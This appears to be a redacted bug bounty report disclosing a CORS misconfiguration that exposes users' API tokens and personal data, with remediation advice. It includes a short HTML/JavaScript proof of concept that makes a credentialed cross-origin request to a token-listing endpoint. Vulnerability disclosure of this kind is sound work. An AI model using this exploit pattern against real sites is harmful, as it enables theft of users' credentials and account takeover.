CORS Misconfiguration Leads to Exposing User Data

**Vulnerable Asset:** https://██████/█████████/ **Discovery:** - Upon accessing the site we discover two specific response headers which indicates that a cross-domain request for sensitive information might be possible 1. Access-Control-Allow-Origin: *injectable* 2. Access-Control-Allow-Credentials: true - We craft a POC below and exploit the misconfigurations present by exposing the users API key, email, first name, last name, etc. ███ **POC:** * This is hosted on http://█████████ ```html <html> <script> var xhttp = new XMLHttpRequest(); <!-- the below endpoint lists API tokens previously generated by the user --> xhttp.open("GET", "https://█████/████/api/token/list", true); xhttp.withCredentials = true; xhttp.send(null); </script> </html> ``` **Demo:** ███████ **Remediations:** - Do not allow the Access-Control-Allow-Origin to be arbitrarily set by the user; the domain should be whitelisted that is allowed access to CORS, or the wildcard operator `*` should be used instead, which will disallow the Allow-Credentials header ## Impact This attack works similarly to a CSRF attack in that an attacker would need to have a victim visit the attacker's website in order to trigger the exploit. If the victim is logged in, then the result is full access to API keys which serve in lieu of username/password as shown in the demo. The attacker then can perform any action within the user's account that the API allows.